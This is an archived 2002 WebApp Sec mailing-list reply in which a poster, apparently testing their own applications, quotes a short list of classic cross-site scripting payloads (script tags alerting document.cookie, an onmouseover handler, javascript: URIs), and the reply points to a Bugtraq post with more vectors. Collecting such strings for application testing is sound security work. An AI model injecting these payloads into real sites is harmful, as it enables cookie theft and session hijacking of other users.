WebApp Sec mailing list archives

Re: XSS Strings

From: Jeroen Latour <jlatour () calaquendi net>
Date: Mon, 16 Dec 2002 09:49:31 +0100

At 23:54 15-12-2002 -0800, securityarchitect () hush com wrote:

Maybe more for vuln-dev but I have bitten the bullet and pulled out wgetand perl and am gonna start testing my apps for XSS and I need to buildthe ultimate list of payloads.
For the html tags period I guess its the classic;

<script>alert(document.cookie)</script>
<a href="X" onmouseover="alert(document.cookie">
<javascript ="http://www.host/script.js";
"javascript:alert(document.cookie)"
<iframe = c:\>
<img src = "evil.js">

But I seem to recall some old versions of Netscape run the { etc
Does anyone have a good list of payloads that will cover the majority ofthe options ?

Take a look athttp://online.securityfocus.com/archive/1/272037/2002-05-09/2002-05-15/0

That bugtraq posts shows a few dozen ways to execute malicious code. Thereare others, of course.

Jeroen

Current thread:

XSS Strings securityarchitect (Dec 16)
- Re: XSS Strings Martin Eiszner (Dec 16)
- Re: XSS Strings Jeroen Latour (Dec 16)
- RE: XSS Strings Glyn (Dec 16)
- Re: XSS Strings Tomas (Dec 16)
  - encoder N30 (Dec 19)
    - Re: encoder Kevin Spett (Dec 19)